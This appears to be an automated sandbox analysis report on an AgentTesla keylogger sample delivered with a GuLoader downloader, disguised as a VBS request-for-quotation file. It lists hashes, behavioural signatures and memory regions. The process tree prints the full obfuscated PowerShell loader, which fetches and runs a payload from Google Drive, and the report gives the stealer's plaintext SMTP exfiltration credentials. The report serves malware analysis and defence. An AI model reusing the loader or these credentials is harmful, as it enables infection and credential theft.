agenttesla | 589ff5fe38affd1583e9d10185a72c7ecfcbe6a7f31e7bdb3d4fd421fa6fc028

Analysis

max time kernel
139s
max time network
147s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
19/03/2024, 13:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RFQ3530904_3000030453_19.03.2024.vbs
Size

167KB
MD5

a66a59b3ecfeb23d87909fc5f251538e
SHA1

b0317dbed465df71b328e35776cf8bb5398e58ea
SHA256

9531a0453fb29dafae440ba874c0178ff913de9b600f118b3d4447036989deec
SHA512

334ffdcc9e91be2e72b26979f1ff09a98882270accd28161696e54a3f8eb5bcee944ff6510b3c338d2ca0d75221398e87075db572cbfd0c6225a1ed6793ab6f0
SSDEEP

3072:sc4yENVBkYr4LhpVXpKnupn8kH3DPbkhZi3eNR+FXOukEbs1cf4GgBo4K0QX3:sc4yENVOY0NpVXpK68kH3DPbkhZi3eNq

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.oysterglobalsa.com.ar
Port:
587
Username:
[email protected]
Password:
Tobiasinfo1

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.oysterglobalsa.com.ar
Port:
587
Username:
[email protected]
Password:
Tobiasinfo1
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1772	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	api.ipify.org
17	ip-api.com
15	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1936	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2216	powershell.exe
1936	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2216 set thread context of 1936	2216	powershell.exe	34

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2768	powershell.exe
2216	powershell.exe
2216	powershell.exe
1936	wab.exe
1936	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2216	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	1936	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1772 wrote to memory of 2768	1772	WScript.exe	28
PID 1772 wrote to memory of 2768	1772	WScript.exe	28
PID 1772 wrote to memory of 2768	1772	WScript.exe	28
PID 2768 wrote to memory of 2604	2768	powershell.exe	30
PID 2768 wrote to memory of 2604	2768	powershell.exe	30
PID 2768 wrote to memory of 2604	2768	powershell.exe	30
PID 2768 wrote to memory of 2216	2768	powershell.exe	32
PID 2768 wrote to memory of 2216	2768	powershell.exe	32
PID 2768 wrote to memory of 2216	2768	powershell.exe	32
PID 2768 wrote to memory of 2216	2768	powershell.exe	32
PID 2216 wrote to memory of 1304	2216	powershell.exe	33
PID 2216 wrote to memory of 1304	2216	powershell.exe	33
PID 2216 wrote to memory of 1304	2216	powershell.exe	33
PID 2216 wrote to memory of 1304	2216	powershell.exe	33
PID 2216 wrote to memory of 1936	2216	powershell.exe	34
PID 2216 wrote to memory of 1936	2216	powershell.exe	34
PID 2216 wrote to memory of 1936	2216	powershell.exe	34
PID 2216 wrote to memory of 1936	2216	powershell.exe	34
PID 2216 wrote to memory of 1936	2216	powershell.exe	34
PID 2216 wrote to memory of 1936	2216	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ3530904_3000030453_19.03.2024.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Indekslaans allittereredes Hderligheder Smrbokse Fimbriates Brandsvampen Brugerorganisationen #>;$Alvorsstunden=(cmd /c set /A 115^^0);Function Vindhvirvler74 ([String]$Vveskyttel){$Alvorsstunden=[char][int]$Alvorsstunden;$Attentatforsgene=$Alvorsstunden+'ubstring';$Stockholdings=8;$Skdeskindet=megans($Vveskyttel);For($Medallists=7; $Medallists -lt $Skdeskindet; $Medallists+=$Stockholdings){$spectant=$Vveskyttel.$Attentatforsgene.Invoke($Medallists, 1);$Jittering=$Jittering+$spectant;}$Jittering;}function Egoistiske ($Fluesvampes){& ($Understatementen) ($Fluesvampes);}function megans ([String]$Blurs){$Forannvnt=$Blurs.Length-1;$Forannvnt;}$Ungskuers220=Vindhvirvler74 ' lairinT Reali.rSeborrhaSmileprnSpiratesHi.ackef BrnemieirrecogrNothingrfor.ycai Rabbi nArtabeag Apotek ';$Eclating=Vindhvirvler74 'Gentag.hUd tyritDesipiet Sa.icyp DumpeksBlimun,:Chubasc/Demogr./ulbertodTribesmrorientii YdermavUnseemleKontrak..pirrevgFlaskeboSussanno.oxedydgSupersplMaskulieIcht yo. FrossecbloktiloAnoplotmtrikinh/G,yceriuF blgercerotoma?Choktile ,lateaxBesyngupSengetio.hiasmarSwa kietDyrtids= redetedapocrinoR ngwiswJuridicn Venstrl ,derpuoTesaurua verflodOppon r&Dupped,iIsolatidTriangl= ammen1Hj,mfrdmcori elHSederssMwafdinfzLillisgd,ksponeJMarkedsPEskaperAOutvigi_Expansir Dejtruehe atoc5 lim,sa-Afd,agsB Unders4.krpesfRTale.meZBaadru j BestianDessaum1myxochoeTricladTParterrgGl bousaUrenhe k Rokke mCherubiDAp.teleISpangin3HydrolymTrochisNMaluecrQGloh,de ';$Understatementen=Vindhvirvler74 'ZygotobiPara hueBygningxcresyl. ';$Monotrocha25=Vindhvirvler74 'Sknsfor$paizedrgFittingl .rotocob,oklapbD,gnoscaHumfri.l Atrop.:OstracoSVelgrenkZincifirFrste aaHereditv andelse ogyishr Sp.culi temasknDifferegKnoglece Forsr nFrokostsNuppess Alle,or=metri,i ArtilleS Forbrutmaanedsa,okketbrHematintSemiswe-HsligtcB BlddeliPoress.tAmorbuesUnproveTGejserorHolo toaSelvflgnKak.elss UnfertfbaandfieSerb.aurErlggel Algori-uredinoS omaceooaphanituAu oforr LampencTiggermeRicinu, Defunct$UndsigeEK.ndingc TrsteslSpeltzeaOldsagstSenioriiDoylenonRigsretg Stirra Rariti-BrugergD Beijine StyrtbsMidjerntCoconu.i okolovnSeedfulaTorumsltDias,imi Afledno,iprinenSpec,ie Nas.buc$Thiohy,R Konk,eeKuvertftHje.tesoKhvatenrbrittontCykeltyeE.herisdHortyar ';Egoistiske (Vindhvirvler74 ' Beatgr$Au,iolog Unsignl Entocyohedge,obRestsk.a UnextelCow unc: Ba.ancR.lagtereAntihistKonnektoArveretr Drejert AutoopeUnsonordInd ode=Glane.d$ T,gneseOmlggenn SengetvUniform:Robandwa PrimmipfifleripFjlescidTorrindaU,orenetAlko.olatemblor ') ;Egoistiske (Vindhvirvler74 ' B.nesaI Amusesm Uranotp regne,oWienersrSubor it,olcine-WiddiesMFlyteocoMarlinsd ha.meruMononitlSkudfrieSamlero MonograBForthini preinftCarucatsglle,ueTAblek,rrGennemsaTwanginn ataliss HjuldafSundhede,ormyporDecrown ') ;$Retorted=$Retorted+'\Fadllerne.Sam' ;Egoistiske (Vindhvirvler74 'Transpo$DitikergGrissetlBpssgneoRuchbahbKontrolaCoo,eralApoplek:Truss rrSmkkereiMulendedO.debatgHel.ctieMessagel ynechtsfilipsg=Nastac (FremlejTOplys,ieSkraastsTelegratLnsomhe-AmbitisPAlderenaUnspotttEmnedefh Scowma Trafikl$Fr.iggrR p.econe Conjugt,onrefroRitualirLut,ingtHandelse Bev,tedPerseve)Paunchf ') ;while (-not $ridgels) {Egoistiske (Vindhvirvler74 'MenuemnIpro rypf Hatti. Autokla( Stadio$TechnicSIdsstick Aflaasr S.opedaHypomorvSlutkameBlyglanrperfun,iIndstilnKoglerigExtinctepan,erenUdlngensKryolit.Be elliJLumboc oSaddukeb OmmerdSServendtPreformaEfterultProtecteu.timat Eq inia-Peninsuefiddedsq Sortil Spndn n$Daphn,oUAa safsnelementggoldenhsk rtagik LevereuOceanideOveriodrBloopers Ma.age2Luftgen2 Vegeta0Overbyg)Vinega. Afbl,te{u plummSOptrkk t slagvoa GalleorPs,udoct Knofed-HovedprSTekstfilBombasteMosulfoeImpietipKredi g Svinde1valua l}Stemme.eUnodenuloceanidsIvaerkseExtrava{AsthorsS BandurtColemouaHallucirPoliti t Halfp,-AmytalbSOversudl Ind rye Tre.ece reittopB.lledb oprulle1 Favori;Aloe,woEVlgernegPragmatoAmberneitrach lsUbetnkstAbsonoui GormansLilleskkOldermnePantesi Pa.bac$OchlocrMLsefageo UnhitcnA.leenaoAllo ortMe arberMyriadeoarguesgcTendablhTvelydsaGendarm2Afskrab5disse t}Verde s ');Egoistiske (Vindhvirvler74 'Enc,fal$ Oblongg Cutwo.lKonfronoNittehabDiffracaFlamboyladulter: A,etylr DerefeiVaabnerdTheatrigRekognoe HjrepalSolonetsPontian=Ac,roma(Pent,baT DdsanneViscerasFllesfatKnirker- SekulaPForskudaNe.vsittProtocehListete E lesbr$Mo,gaaeRAfsagdeeisopathtB ndoleo unde,tr .loakltSkinfliesalonbsdForvorp)secret, ') ;}Egoistiske (Vindhvirvler74 'Thanias$BaandopgBetnkellSkrveb,oBrad orbstingraaS.iftsdlfremove: GonagiHPreconfa FinedrlRetsstieAdvoweefKa tekiiOutlengn Uncongni,traveeStereocrSkavank Hulkel=Uniform B frielGCleanlieTeiidaetBoremas-RevnedeCFlo ermoCat lovnPikningt Gni,geeEpheb an Stdigit Jemedu Polyest$ Afrid.RAblegate B.gcaftHjemlaaoVejrbesrSe,ldugtSuperste,ortgagdHulahar ');Egoistiske (Vindhvirvler74 'fiskefa$WatchergOlfac olZodiophoScol,pabBattlehaEn,eradlForfrem: NonumbK loutinoTemporimCitrongpMagn tieAbalonetPlenarfeGamblernZeedtr cMollacaeAktiebofOffendaoDubbingrSte.rigsSimesymkFo,tidsyChildmidministenTroldd.iScro.icnUnsaggigFemogtye Skaermr NeostynhovedpueAfgre.ssAdresse Peculia= Fondsm infan,e[TalismaSP,ssiveysnebrresSeal,bltKdehandePignutpmTandh,u.ApatheiCPredisgoCountern bothervDisparae OverhorProje,tt Pen io] Lsslup:Actiado:InseminFTrindlerPrimaveoAdvancemUrkrft.BSkyde,pa NonviasStorfyreFestpro6Tyrkens4MaalepuSUnerrantG nkaldrKickwhei Unhubrn demonsgStringp(Ma ihot$Voldgi,H Amphi,aFow.corlMottetteSq,intefPersiasi.oegrianStatskin reliefe Mi,ligrSkyldig)Smaafug ');Egoistiske (Vindhvirvler74 'Taeniob$F.geliggFormsyel CartiloFronterbRepulluaantibiol Afsk i: ubertD AlbuemeSavedeslBesrainy mousses PuljertvakuumbeEncouranDanskt, Metamer=For.gte yhandt[HerculeSPandyrjyLuftkonsSpiraletTryknapeNamelesmAnguish.Ox,ardbTAarsregeyadnonixghastfutMisstee. YachtmESch,olmn Styrthc OmsvbeoIntravedRetireriTittlinn StilskgBrnekul]Electro: Pumpen:analfasA bajoneSBelli,oCSk.lemoIButesukI Bagage. Ov lisGTele,dsePat.olytOverorgS NummertKlargoerEnc phaibillondnBadessogS.alers(Infe.ra$HidradeKOlf rtjoS eamilmlianefop .ostpaetankfu tSisterleDo umenn cou.eec ,utproeProthalfAlvastio OutbakrP,agenmsUnacclikF.rsvary Stand dR.bonicnTiercesiAldersknMenneskg Branche ,fstvnrKurer rnsloggineRebnings Faldst)Crusado ');Egoistiske (Vindhvirvler74 'Outthan$PistolggSkppesklLdreuddo Keelb,bMusefldaA noncelStart.n:SekstenP Carcinl JubassaF,ondift ForskeePukhtunnTrelbetsLrmotoc= Nynnen$GifteknDOmvendte FelicilAlcoholyNutati.sRe erentFrasorteFlexurenSydstli.Fl,desus SeneskusodiohybIndadgassoka nntLaparomrThereoiiP intkonBossanogWispier(Drossel3Dyrerig0Sprog,i9Bassang8Udraabe8.kadesf2s,beris,Unapper3Udsigts1Acidsau9Kdfarse0Pellicu3Tingest)tilflug ');Egoistiske $Platens;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c set /A 115^^0
    3⤵
    PID:2604
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Indekslaans allittereredes Hderligheder Smrbokse Fimbriates Brandsvampen Brugerorganisationen #>;$Alvorsstunden=(cmd /c set /A 115^^0);Function Vindhvirvler74 ([String]$Vveskyttel){$Alvorsstunden=[char][int]$Alvorsstunden;$Attentatforsgene=$Alvorsstunden+'ubstring';$Stockholdings=8;$Skdeskindet=megans($Vveskyttel);For($Medallists=7; $Medallists -lt $Skdeskindet; $Medallists+=$Stockholdings){$spectant=$Vveskyttel.$Attentatforsgene.Invoke($Medallists, 1);$Jittering=$Jittering+$spectant;}$Jittering;}function Egoistiske ($Fluesvampes){& ($Understatementen) ($Fluesvampes);}function megans ([String]$Blurs){$Forannvnt=$Blurs.Length-1;$Forannvnt;}$Ungskuers220=Vindhvirvler74 ' lairinT Reali.rSeborrhaSmileprnSpiratesHi.ackef BrnemieirrecogrNothingrfor.ycai Rabbi nArtabeag Apotek ';$Eclating=Vindhvirvler74 'Gentag.hUd tyritDesipiet Sa.icyp DumpeksBlimun,:Chubasc/Demogr./ulbertodTribesmrorientii YdermavUnseemleKontrak..pirrevgFlaskeboSussanno.oxedydgSupersplMaskulieIcht yo. FrossecbloktiloAnoplotmtrikinh/G,yceriuF blgercerotoma?Choktile ,lateaxBesyngupSengetio.hiasmarSwa kietDyrtids= redetedapocrinoR ngwiswJuridicn Venstrl ,derpuoTesaurua verflodOppon r&Dupped,iIsolatidTriangl= ammen1Hj,mfrdmcori elHSederssMwafdinfzLillisgd,ksponeJMarkedsPEskaperAOutvigi_Expansir Dejtruehe atoc5 lim,sa-Afd,agsB Unders4.krpesfRTale.meZBaadru j BestianDessaum1myxochoeTricladTParterrgGl bousaUrenhe k Rokke mCherubiDAp.teleISpangin3HydrolymTrochisNMaluecrQGloh,de ';$Understatementen=Vindhvirvler74 'ZygotobiPara hueBygningxcresyl. ';$Monotrocha25=Vindhvirvler74 'Sknsfor$paizedrgFittingl .rotocob,oklapbD,gnoscaHumfri.l Atrop.:OstracoSVelgrenkZincifirFrste aaHereditv andelse ogyishr Sp.culi temasknDifferegKnoglece Forsr nFrokostsNuppess Alle,or=metri,i ArtilleS Forbrutmaanedsa,okketbrHematintSemiswe-HsligtcB BlddeliPoress.tAmorbuesUnproveTGejserorHolo toaSelvflgnKak.elss UnfertfbaandfieSerb.aurErlggel Algori-uredinoS omaceooaphanituAu oforr LampencTiggermeRicinu, Defunct$UndsigeEK.ndingc TrsteslSpeltzeaOldsagstSenioriiDoylenonRigsretg Stirra Rariti-BrugergD Beijine StyrtbsMidjerntCoconu.i okolovnSeedfulaTorumsltDias,imi Afledno,iprinenSpec,ie Nas.buc$Thiohy,R Konk,eeKuvertftHje.tesoKhvatenrbrittontCykeltyeE.herisdHortyar ';Egoistiske (Vindhvirvler74 ' Beatgr$Au,iolog Unsignl Entocyohedge,obRestsk.a UnextelCow unc: Ba.ancR.lagtereAntihistKonnektoArveretr Drejert AutoopeUnsonordInd ode=Glane.d$ T,gneseOmlggenn SengetvUniform:Robandwa PrimmipfifleripFjlescidTorrindaU,orenetAlko.olatemblor ') ;Egoistiske (Vindhvirvler74 ' B.nesaI Amusesm Uranotp regne,oWienersrSubor it,olcine-WiddiesMFlyteocoMarlinsd ha.meruMononitlSkudfrieSamlero MonograBForthini preinftCarucatsglle,ueTAblek,rrGennemsaTwanginn ataliss HjuldafSundhede,ormyporDecrown ') ;$Retorted=$Retorted+'\Fadllerne.Sam' ;Egoistiske (Vindhvirvler74 'Transpo$DitikergGrissetlBpssgneoRuchbahbKontrolaCoo,eralApoplek:Truss rrSmkkereiMulendedO.debatgHel.ctieMessagel ynechtsfilipsg=Nastac (FremlejTOplys,ieSkraastsTelegratLnsomhe-AmbitisPAlderenaUnspotttEmnedefh Scowma Trafikl$Fr.iggrR p.econe Conjugt,onrefroRitualirLut,ingtHandelse Bev,tedPerseve)Paunchf ') ;while (-not $ridgels) {Egoistiske (Vindhvirvler74 'MenuemnIpro rypf Hatti. Autokla( Stadio$TechnicSIdsstick Aflaasr S.opedaHypomorvSlutkameBlyglanrperfun,iIndstilnKoglerigExtinctepan,erenUdlngensKryolit.Be elliJLumboc oSaddukeb OmmerdSServendtPreformaEfterultProtecteu.timat Eq inia-Peninsuefiddedsq Sortil Spndn n$Daphn,oUAa safsnelementggoldenhsk rtagik LevereuOceanideOveriodrBloopers Ma.age2Luftgen2 Vegeta0Overbyg)Vinega. Afbl,te{u plummSOptrkk t slagvoa GalleorPs,udoct Knofed-HovedprSTekstfilBombasteMosulfoeImpietipKredi g Svinde1valua l}Stemme.eUnodenuloceanidsIvaerkseExtrava{AsthorsS BandurtColemouaHallucirPoliti t Halfp,-AmytalbSOversudl Ind rye Tre.ece reittopB.lledb oprulle1 Favori;Aloe,woEVlgernegPragmatoAmberneitrach lsUbetnkstAbsonoui GormansLilleskkOldermnePantesi Pa.bac$OchlocrMLsefageo UnhitcnA.leenaoAllo ortMe arberMyriadeoarguesgcTendablhTvelydsaGendarm2Afskrab5disse t}Verde s ');Egoistiske (Vindhvirvler74 'Enc,fal$ Oblongg Cutwo.lKonfronoNittehabDiffracaFlamboyladulter: A,etylr DerefeiVaabnerdTheatrigRekognoe HjrepalSolonetsPontian=Ac,roma(Pent,baT DdsanneViscerasFllesfatKnirker- SekulaPForskudaNe.vsittProtocehListete E lesbr$Mo,gaaeRAfsagdeeisopathtB ndoleo unde,tr .loakltSkinfliesalonbsdForvorp)secret, ') ;}Egoistiske (Vindhvirvler74 'Thanias$BaandopgBetnkellSkrveb,oBrad orbstingraaS.iftsdlfremove: GonagiHPreconfa FinedrlRetsstieAdvoweefKa tekiiOutlengn Uncongni,traveeStereocrSkavank Hulkel=Uniform B frielGCleanlieTeiidaetBoremas-RevnedeCFlo ermoCat lovnPikningt Gni,geeEpheb an Stdigit Jemedu Polyest$ Afrid.RAblegate B.gcaftHjemlaaoVejrbesrSe,ldugtSuperste,ortgagdHulahar ');Egoistiske (Vindhvirvler74 'fiskefa$WatchergOlfac olZodiophoScol,pabBattlehaEn,eradlForfrem: NonumbK loutinoTemporimCitrongpMagn tieAbalonetPlenarfeGamblernZeedtr cMollacaeAktiebofOffendaoDubbingrSte.rigsSimesymkFo,tidsyChildmidministenTroldd.iScro.icnUnsaggigFemogtye Skaermr NeostynhovedpueAfgre.ssAdresse Peculia= Fondsm infan,e[TalismaSP,ssiveysnebrresSeal,bltKdehandePignutpmTandh,u.ApatheiCPredisgoCountern bothervDisparae OverhorProje,tt Pen io] Lsslup:Actiado:InseminFTrindlerPrimaveoAdvancemUrkrft.BSkyde,pa NonviasStorfyreFestpro6Tyrkens4MaalepuSUnerrantG nkaldrKickwhei Unhubrn demonsgStringp(Ma ihot$Voldgi,H Amphi,aFow.corlMottetteSq,intefPersiasi.oegrianStatskin reliefe Mi,ligrSkyldig)Smaafug ');Egoistiske (Vindhvirvler74 'Taeniob$F.geliggFormsyel CartiloFronterbRepulluaantibiol Afsk i: ubertD AlbuemeSavedeslBesrainy mousses PuljertvakuumbeEncouranDanskt, Metamer=For.gte yhandt[HerculeSPandyrjyLuftkonsSpiraletTryknapeNamelesmAnguish.Ox,ardbTAarsregeyadnonixghastfutMisstee. YachtmESch,olmn Styrthc OmsvbeoIntravedRetireriTittlinn StilskgBrnekul]Electro: Pumpen:analfasA bajoneSBelli,oCSk.lemoIButesukI Bagage. Ov lisGTele,dsePat.olytOverorgS NummertKlargoerEnc phaibillondnBadessogS.alers(Infe.ra$HidradeKOlf rtjoS eamilmlianefop .ostpaetankfu tSisterleDo umenn cou.eec ,utproeProthalfAlvastio OutbakrP,agenmsUnacclikF.rsvary Stand dR.bonicnTiercesiAldersknMenneskg Branche ,fstvnrKurer rnsloggineRebnings Faldst)Crusado ');Egoistiske (Vindhvirvler74 'Outthan$PistolggSkppesklLdreuddo Keelb,bMusefldaA noncelStart.n:SekstenP Carcinl JubassaF,ondift ForskeePukhtunnTrelbetsLrmotoc= Nynnen$GifteknDOmvendte FelicilAlcoholyNutati.sRe erentFrasorteFlexurenSydstli.Fl,desus SeneskusodiohybIndadgassoka nntLaparomrThereoiiP intkonBossanogWispier(Drossel3Dyrerig0Sprog,i9Bassang8Udraabe8.kadesf2s,beris,Unapper3Udsigts1Acidsau9Kdfarse0Pellicu3Tingest)tilflug ');Egoistiske $Platens;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2216
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c set /A 115^^0
      4⤵
      PID:1304
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
27630ef31bedb18a4d38fd3878da7591

SHA1
e4ce28ac2e0dfc1a270bd864c512ad489c701b68

SHA256
a78cd00ce57475604257ee4ad0df3967519c69844a7fa8cb4664489dbdc63ddb

SHA512
fa6a2ed7a8d9006e5f2ec8e9467a35bcd145f1ab796d51b8c11d713a3c835c1bba0b5a371d83b1c1e8433d58adfe275e444e7b3569d8b3848b4105043185efd4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
62911bc478654e5766809969e052f744

SHA1
e485777515f19b77c8f2ab19baa8a5b445d46375

SHA256
607983166c5518cb773d75236308134b31a0488736081598e219d1574e3b3ee5

SHA512
d43059d0cf4b1420ac6b489dd78af61abb4401b2c41fdc07bd0ab9c12091c6dcd394cf3abd898e74592f17309880f3984ab7becd518976d3a33208de2bf4bd38

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA15F.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BJG3B5ITF47VVWFGS00G.temp

Filesize
7KB

MD5
8de6951fa690456a978cd5accc771001

SHA1
58c250ffce7843eb15a2b3387b8d8ee2abd886fa

SHA256
363eb12e96838717353a120a16857ac9fd349e0ecb06be995733d45624102d2c

SHA512
d948848d42c13a9549c19a3fb14aa39c2fc34ecd39fb1433e7da4965ea1a5b90cd6b0cd05c911d5ec98a235de4aeab9def2b67a611e4fb5aa855c32b9a39fc4b

Download Submit
memory/1936-86-0x0000000000EC0000-0x0000000001F22000-memory.dmp

Filesize
16.4MB

Download
memory/1936-90-0x0000000000EC0000-0x0000000000F02000-memory.dmp

Filesize
264KB

Download
memory/1936-88-0x0000000077A80000-0x0000000077B56000-memory.dmp

Filesize
856KB

Download
memory/1936-60-0x0000000001F30000-0x00000000047E2000-memory.dmp

Filesize
40.7MB

Download
memory/1936-92-0x000000006F220000-0x000000006F90E000-memory.dmp

Filesize
6.9MB

Download
memory/1936-93-0x000000001F630000-0x000000001F670000-memory.dmp

Filesize
256KB

Download
memory/1936-94-0x0000000001F30000-0x00000000047E2000-memory.dmp

Filesize
40.7MB

Download
memory/1936-65-0x0000000077AB6000-0x0000000077AB7000-memory.dmp

Filesize
4KB

Download
memory/1936-64-0x0000000077A80000-0x0000000077B56000-memory.dmp

Filesize
856KB

Download
memory/1936-97-0x000000006F220000-0x000000006F90E000-memory.dmp

Filesize
6.9MB

Download
memory/1936-98-0x000000001F630000-0x000000001F670000-memory.dmp

Filesize
256KB

Download
memory/1936-62-0x0000000077890000-0x0000000077A39000-memory.dmp

Filesize
1.7MB

Download
memory/2216-33-0x00000000738D0000-0x0000000073E7B000-memory.dmp

Filesize
5.7MB

Download
memory/2216-35-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2216-89-0x0000000006990000-0x0000000009242000-memory.dmp

Filesize
40.7MB

Download
memory/2216-32-0x00000000738D0000-0x0000000073E7B000-memory.dmp

Filesize
5.7MB

Download
memory/2216-34-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2216-53-0x0000000006990000-0x0000000009242000-memory.dmp

Filesize
40.7MB

Download
memory/2216-54-0x00000000055B0000-0x00000000055B1000-memory.dmp

Filesize
4KB

Download
memory/2216-55-0x0000000006990000-0x0000000009242000-memory.dmp

Filesize
40.7MB

Download
memory/2216-56-0x00000000738D0000-0x0000000073E7B000-memory.dmp

Filesize
5.7MB

Download
memory/2216-57-0x0000000077890000-0x0000000077A39000-memory.dmp

Filesize
1.7MB

Download
memory/2216-58-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2216-59-0x0000000077A80000-0x0000000077B56000-memory.dmp

Filesize
856KB

Download
memory/2216-48-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2216-63-0x0000000006990000-0x0000000009242000-memory.dmp

Filesize
40.7MB

Download
memory/2768-28-0x0000000002C00000-0x0000000002C80000-memory.dmp

Filesize
512KB

Download
memory/2768-26-0x0000000002C00000-0x0000000002C80000-memory.dmp

Filesize
512KB

Download
memory/2768-52-0x0000000002C00000-0x0000000002C80000-memory.dmp

Filesize
512KB

Download
memory/2768-21-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2768-51-0x0000000002C00000-0x0000000002C80000-memory.dmp

Filesize
512KB

Download
memory/2768-29-0x0000000002C00000-0x0000000002C80000-memory.dmp

Filesize
512KB

Download
memory/2768-49-0x0000000002C00000-0x0000000002C80000-memory.dmp

Filesize
512KB

Download
memory/2768-27-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-47-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-91-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-50-0x0000000002C00000-0x0000000002C80000-memory.dmp

Filesize
512KB

Download
memory/2768-25-0x0000000002AC0000-0x0000000002AD2000-memory.dmp

Filesize
72KB

Download
memory/2768-24-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Filesize
9.6MB

Download
memory/2768-23-0x0000000002BA0000-0x0000000002BC2000-memory.dmp

Filesize
136KB

Download
memory/2768-22-0x00000000021E0000-0x00000000021E8000-memory.dmp

Filesize
32KB

Download